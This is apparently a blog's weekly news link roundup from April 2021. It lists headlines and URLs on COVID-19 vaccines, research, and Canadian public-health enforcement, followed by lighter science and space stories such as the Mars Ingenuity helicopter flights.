  • AstraZeneca’s 1.5M COVID-19 shots from Baltimore plant are safe: Health Canada https://globalnews.ca/news/7788122/health-canada-astrazeneca-covid-vaccines/
  • COVID-19: Ontario won’t lower AstraZeneca vaccine age threshold currently given limited supply https://globalnews.ca/news/7784138/ontario-astrazeneca-covid-vaccination-age/
  • One dose of AstraZeneca or Pfizer's vaccine provides protection against COVID-19 that lasts at least 10 weeks https://www.businessinsider.com/one-dose-astrazeneca-or-pfizer-vaccine-protects-against-covid-19-2021-4
  • CDC committee backs Johnson & Johnson COVID-19 vaccine https://www.theverge.com/2021/4/23/22399998/covid-vaccine-johnson-cdc-pause-clots-risk
  • COVID-19: ‘Ring vaccination’ can teach us how to target limited supply https://globalnews.ca/news/7777204/covid-19-ring-vaccination-canada/
  • Auditor general to review how COVID-19 vaccination hot spot postal codes were chosen https://toronto.ctvnews.ca/auditor-general-to-review-how-covid-19-vaccination-hot-spot-postal-codes-were-chosen-1.5394412
  • Family of 97-year-old who just got COVID-19 vaccine fears all homebound seniors won't get shot until fall https://toronto.ctvnews.ca/family-of-97-year-old-who-just-got-covid-19-vaccine-fears-all-homebound-seniors-won-t-get-shot-until-fall-1.5396834
  • Vaccination doesn’t mean a return to pre-COVID-19 lifestyle, Manitoba health official says https://globalnews.ca/news/7781383/vaccination-return-pre-covid-19-lifestyle-manitoba-health-official/
  • Scientists uncover a molecule that can help coronavirus escape antibodies https://scienmag.com/scientists-uncover-a-molecule-that-can-help-coronavirus-escape-antibodies/
  • Scientists unmask new neutralizing antibody target on SARS-CoV-2 spike protein https://scienmag.com/scientists-unmask-new-neutralizing-antibody-target-on-sars-cov-2-spike-protein/

• Things we learned:

  • Simple oral hygiene could help reduce COVID-19 severity – study https://scienmag.com/simple-oral-hygiene-could-help-reduce-covid-19-severity-study/
  • Faster air exchange in buildings not always beneficial for coronavirus levels https://scienmag.com/faster-air-exchange-in-buildings-not-always-beneficial-for-coronavirus-levels/
  • Covid: Scientists find more evidence of human-to-cat transmission https://www.bbc.co.uk/news/uk-scotland-glasgow-west-56821770
  • ‘I couldn’t take it anymore’: Why some medical staff are calling it quits amid COVID-19 https://globalnews.ca/news/7782649/covid-19-medical-staff-mental-health/

• More of the good, the bad, and the ugly:

  • Coronavirus: Okanagan business bans people vaccinated against COVID-19 from entering https://globalnews.ca/news/7782133/coronavirus-okanagan-business-bans-people-vaccinated-against-covid-19-from-entering/
  • Covid: Man arrested after infecting 22 people in Majorca https://www.bbc.co.uk/news/world-europe-56874018

• Masks, anti-maskers, distancing, compliance, and repercussions:

  • 100 people attend anti-mask children’s carnival in Saskatoon https://globalnews.ca/news/7787002/anti-mask-childrens-carnival-saskatoon/
  • Kelowna anti-mask, anti-vaccine gym ordered closed https://globalnews.ca/news/7781036/covid-kelowna-gym-ordered-closed/
  • More than 200 travellers arriving in Ontario have refused to stay in quarantine hotels https://toronto.ctvnews.ca/more-than-200-travellers-arriving-in-ontario-have-refused-to-stay-in-quarantine-hotels-1.5396802
  • Ontario man charged after allegedly using fake COVID-19 document at Pearson Airport https://toronto.ctvnews.ca/ontario-man-charged-after-allegedly-using-fake-covid-19-document-at-pearson-airport-1.5396772
  • Vancouver exploring legal action against health order-defying restaurant: Mayor https://globalnews.ca/news/7786567/corduroy-restaurant-vancouver-health-orders/
  • COVID-19: 22 people charged for violating N.S. Health Protection Act https://globalnews.ca/news/7786134/n-s-health-protection-act-violations-covid-april-24/
  • Numerous tickets issued after police break up large party in Toronto https://toronto.ctvnews.ca/numerous-tickets-issued-after-police-break-up-large-party-in-toronto-1.5401536
  • Toronto police begin 'new enforcement approach' to stay-at-home order starting Thursday https://toronto.ctvnews.ca/toronto-police-begin-new-enforcement-approach-to-stay-at-home-order-starting-thursday-1.5397371
  • Toronto police launching dedicated COVID-19 teams in each division to target large gatherings https://globalnews.ca/news/7779141/toronto-police-covid-enforcement-teams/
  • 5 Ontarians from different addresses charged after riding in same car during stay-at-home order https://globalnews.ca/news/7777986/5-ontarians-different-addresses-charged-riding-same-car-covid-19/
  • Some Queen’s students evicted from residence for COVID-19 non-compliance https://globalnews.ca/news/7780371/queens-covid-19-student-residence-evictions/
  • This Biodegradable Face Mask Can Be Planted When You’re Done Using It https://www.mentalfloss.com/article/645839/biodegradable-face-mask-can-be-planted

Off-Topic / Science & Tech / Lighter Side

A variety of scientific, technical, historical, and more light-hearted news.

• 15 People Just Spent 40 Days in a Cave Without Phones, Clocks, or Sunlight https://www.sciencealert.com/15-volunteers-lived-in-a-cave-with-no-phones-clocks-or-sunlight-for-40-days
• Can You Train Yourself to Be a Morning Person if You're a Night Owl? https://www.sciencealert.com/can-you-train-yourself-to-be-a-morning-person-if-you-re-a-night-owl
• T. Rex liked to walk as slowly as humans do — at a leisurely 3 miles per hour (So much for Jurassic Park) https://www.businessinsider.com/t-rex-walking-speed-slow-similar-to-humans-study-2021-4
• When Dr. Demento Ruled the Airwaves https://www.mentalfloss.com/article/644173/dr-demento-ruled-radio
• In a technological first, NASA has made a sip of breathable air on Mars https://www.syfy.com/syfywire/in-a-technological-first-nasa-has-made-a-sip-of-breathable-air-on-mars
• “You Wouldn’t Believe What I Just Saw:” Ingenuity Helicopter Flies Successfully on Mars https://www.universetoday.com/150943/you-wouldnt-believe-what-i-just-saw-ingenuity-helicopter-flies-successfully-on-mars/
• Mars Ingenuity takes flight! https://www.syfy.com/syfywire/mars-ingenuity-takes-flight
• NASA's Mars Ingenuity Helicopter Completes Second Flight https://www.nytimes.com/2021/04/22/science/nasa-mars-helicopter-ingenuity.html
• Quantum Astronomy Could Create Telescopes Hundreds of Kilometers Wide https://www.scientificamerican.com/article/quantum-astronomy-could-create-telescopes-hundreds-of-kilometers-wide/
• Astronomers find an exoplanet where an exoplanet shouldn’t be https://www.syfy.com/syfywire/astronomers-find-an-exoplanet-where-an-exoplanet-shouldnt-be
• Astronomers Have Detected The Closest Black Hole to Earth. Thankfully, It's Tiny https://www.sciencealert.com/astronomers-have-detected-the-closest-black-hole-to-earth-and-it-s-really-tiny